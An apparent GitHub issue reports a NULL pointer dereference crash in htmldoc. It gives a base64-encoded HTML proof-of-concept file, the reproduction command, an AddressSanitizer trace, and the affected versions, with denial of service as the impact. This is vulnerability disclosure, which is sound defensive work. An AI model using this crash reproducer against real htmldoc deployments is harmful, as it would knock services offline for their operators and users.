NULL Pointer Dereference (SIGSEGV)
chameleon10712 opened this issue · 1 comments
chameleon10712 commented
Description
Null pointer dereference in htmldoc
Proof of Concept
echo -ne "PEhUTUw+CjxIRUFEPgoJPFRJVExFPkF0dHJpYnV0ZXMgVGVzdHM8L1RJVExFPgo8L0hFQUQ+CjxCT0RZPgoKPEgxPkF0dHJpYnV0ZXMgVGVzdHM8L0gxPgoKPFA+PFNNQUxMPlNtYWxsPC9TTUFMTD4gTm9ybWFsIDxCSUc+QmlnPC9CSUc+CjxQPjxCPkJvbGQ8L0I+CjxQPjxJPkl0YWxpYzwvST4KPFA+PEI+PEk+Qm9sZC1JdGFsaWM8L0k+PC9CPgo8UD48VT5VbmRlcmxpbmU8L1U+CjxQPjxTVFJJS0U+U3RyaWtldGhyb3VnaDwvU1RSSUtFPgo8SDE+PFNUUklLRT5TdHJpa2V0aHJvdWdoPC9TVFJJS0U+PC9IMT4KPEgyPjxTVFJJS0U+U3RyaWtldGhyb3VnaDwvU1RSSUtFPjwvSDI+CjxIMz48U1RSSUtFPlN0cmlrZXRocm91Z2g8L1NUUklLRT48L0gzPgo8SDQ+PFNUUklLRT5TdHJpa2V0aHJvdWdoPC9TVFJJS0U+PC9IND4KPEg1PjxTVFJJS0U+U3RyaWtldGhyb3VnaDwvU1RSSUtFPjwvSDU+CjxINj48U1RSSUtFPlN0cmlrZXRocm91Z2g8L1NUUklLRT48L0g2PgoKPEgxPlNVQi9TVVAgVGVzdDwvSDE+Cgo8UD5Ob3JtYWw8U1VQPlN1cGVyc2NyaXB0PC9TVVA+CjxQPk5vcm1hbDxTVUI+U3Vic2NyaXB0PC9TVUI+Cgo8SDE+Tm9uLUJyZWFraW5nIFNwYWNlIFRlc3Q8L0gxPgoKPFA+VGhlIGludmVzdG1lbnQgb2JqZWN0aXZlcyB3aGljaCBiZXN0IGRlc2NyaWJlIHRoaXMKcG9ydGZvbGlvOiZuYnNwOyZuYnNwOzx1Pk1heGltdW0gR3Jvd3RoPC91PjogbWF4aW11bSBjYXBpdGFsCmFwcHJlY2lhdGlvbiB3aXRoIGhpZ2hlciByaXNrL3ZvbGF0aWxpdHkgYW5kIG5vIGluY29tZS4KCjwvQk9EWT4KPC9IVE1MPgo=" | base64 -d > poc
normal build
$ /home/oceane/fuzz_test/htmldoc/build_norm/bin/htmldoc --batch /home/oceane/fuzz_test/htmldoc_asan/testsuite/testsuite.book --format html --no-localfiles --titleimage ./ducks.jpg ./poc
ERR005: Unable to find "./poc"...
ERR005: Unable to find image file "./ducks.jpg"!
fish: “/home/oceane/fuzz_test/htmldoc/…” terminated by signal SIGSEGV (Address boundary error)
build with ASAN
$ /home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc --batch /home/oceane/fuzz_test/htmldoc_asan/testsuite/testsuite.book --format html --no-localfiles --titleimage ./ducks.jpg ./poc
ERR005: Unable to find "./poc"...
ERR005: Unable to find image file "./ducks.jpg"!
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2118150==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000404 (pc 0x5557dcbbcf60 bp 0x7ffd3d4117e0 sp 0x7ffd3d411770 T0)
==2118150==The signal is caused by a READ memory access.
==2118150==Hint: address points to the zero page.
#0 0x5557dcbbcf5f (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0xa2f5f)
#1 0x5557dcb62d36 (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0x48d36)
#2 0x7fc8b2037082 in __libc_start_main ../csu/libc-start.c:308
#3 0x5557dcb6c8ad (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0x528ad)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/oceane/fuzz_test/htmldoc_asan/build_asan_flag/bin/htmldoc+0xa2f5f)
==2118150==ABORTING
git commit a4b0dfe5c
gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
g++ (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
Ubuntu 20.04.6 LTS
Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz
Affected Version
- git commit a4b0dfe
- v1.9.16
- v1.9.15
Impact
- Denial of Service
- NULL Pointer Dereference
michaelrsweet commented